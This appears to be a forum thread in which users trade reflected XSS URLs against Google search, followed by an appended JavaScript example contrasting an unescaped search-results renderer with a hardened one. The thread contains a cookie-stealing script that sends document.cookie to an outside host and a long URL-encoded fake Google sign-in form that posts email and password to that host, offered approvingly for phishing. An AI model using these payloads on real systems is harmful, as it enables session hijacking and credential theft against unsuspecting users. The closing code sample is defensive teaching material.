XSS in Google
I just found an XSS vulnerability in Google :D
Those too:
http://www.google.com/search?hl=en&lr=&q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E+inurl%3AXSS&btnG=Search
http://www.google.com/search?hl=en&lr=&q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E+filetype%3AXSS&btnG=Search
Uber0n wrote: I just found an XSS vulnerability in Google :D
How can this be a vulnerability in Google? :p
mido wrote: How can this be a vulnerability in Google? :p
Cookie Stealing?
With a search of: <script>window.location="http://agesofperil.freehostia.com/?cooks="+document.cookie</script>
You could have: Funny Pics
Serious slacking on Google's behalf.
I noticed you used a Google-defined tag in the search, being site:
So I was looking around at it, and realised it does not even need to be a function Google uses.
As long as you add someword:sometext following the XSS string the alert will work.
Shame on Google.
@Mido the cookie stealing opportunities on this are immense, as people automatically trust a link which has google.com at the front. Good times.
Good work though Uberon.
Haha, take a look at this one I just made (fake log in form that works):
or
http://www.google.com.au/search?hl=en&q=%3Cdiv+style%3D%22color%3A%230099FF%3B+backgr ound%3A%23FFFFFF%3B+position%3A+absolute%3B+top%3A+0%3B+height%3A+100%25%3B+width%3A+ 100%25%3B+left%3A+0%3B%22%3E%3Ctable+width%3D100%25+valign%3Dmiddle+height%3D100%25%3 E%3Ctr%3E%3Ctd%3E%3Ccenter%3E%3Cfont+color%3D%23FF0000%3E%3Cb%3E%3Cbr%3E%3Ccenter%3E% 3Cbr%3E%3Ctable+width%3D%22100%25%22%3E%3Ctr%3E%3Ctd%3E%3Cb%3E%3Ccenter%3EYou+must+be +signed+in+to+view+this+page%21%3Cbr%3E%3C%2Fb%3E%3Cbr%3E%3Cimg+src%3D%22https%3A%2F% 2Fwww.google.com%2Faccounts%2Fgoogle_transparent.gif%22%3E+%3Cb%3EAccount%3C%2Fb%3E%3 Cbr%3E%3Ccenter%3E%3Ctable%3E%3Ctr%3E%3Ctd+align%3Dright%3E%3Cform+action%3D%22http%3 A%2F%2Fagesofperil.freehostia.com%2Findex2.php%22+method%3D%22POST%22%3EEmail%3A+%3Ci nput+type%3Dtext+name%3D%22email%22%3E%3Cbr%3EPassword%3A+%3Cinput+type%3Dpassword+na me%3D%22pass%22%3E%3Cbr%3E%3Cinput+type%3Dsubmit+value%3D%22Sign+in%22%3E%3C%2Fform%3 E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Fdiv%3E&btnG=Search&meta=
Looks as though anything goes ;).
Scavix wrote: Haha, take a look at this one I just made (fake log in form that works):
Looks as though anything goes ;).
I made your one better by making it change the title ;)
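Added example, not part of the thread and not Google's code: a constructed "no results" renderer showing how a reflected query can end up unescaped on one code path only, next to a hardened version that encodes once at the output sink. The function names, the page template and the `word:text` operator check are assumptions made for illustration.

```javascript
// Constructed illustration of the bug class discussed in the thread.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can break out of HTML text or attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical operator detection: any "someword:sometext" token in the query.
function hasOperator(query) {
  return /\b\w+:\S+/.test(query);
}

// Flawed: encoding is applied per branch, and the operator branch forgot it.
function renderNoResultsFlawed(query) {
  if (hasOperator(query)) {
    return `<p>Your search - <b>${query}</b> - did not match any documents.</p>`;
  }
  return `<p>Your search - <b>${escapeHtml(query)}</b> - did not match any documents.</p>`;
}

// Hardened: the query is encoded exactly once, where it is written into HTML,
// so no branch can reach the template with raw user input.
function renderNoResultsHardened(query) {
  const safe = escapeHtml(query);
  const note = hasOperator(query) ? ' (operator search)' : '';
  return `<p>Your search - <b>${safe}</b>${note} - did not match any documents.</p>`;
}

// Regression check for a test suite: does the page echo markup from the query verbatim?
function reflectsRawMarkup(html, query) {
  return /[<>]/.test(query) && html.includes(query);
}

// Decoded form of the query string in the first URL quoted in the thread.
const SAMPLE_QUERY = '<script>alert(1)</script> inurl:XSS';

function demo() {
  return {
    flawed: reflectsRawMarkup(renderNoResultsFlawed(SAMPLE_QUERY), SAMPLE_QUERY),
    hardened: reflectsRawMarkup(renderNoResultsHardened(SAMPLE_QUERY), SAMPLE_QUERY),
  };
}
```

Running `reflectsRawMarkup` over every template that echoes the query, with and without an operator token, is what catches a branch that skips encoding.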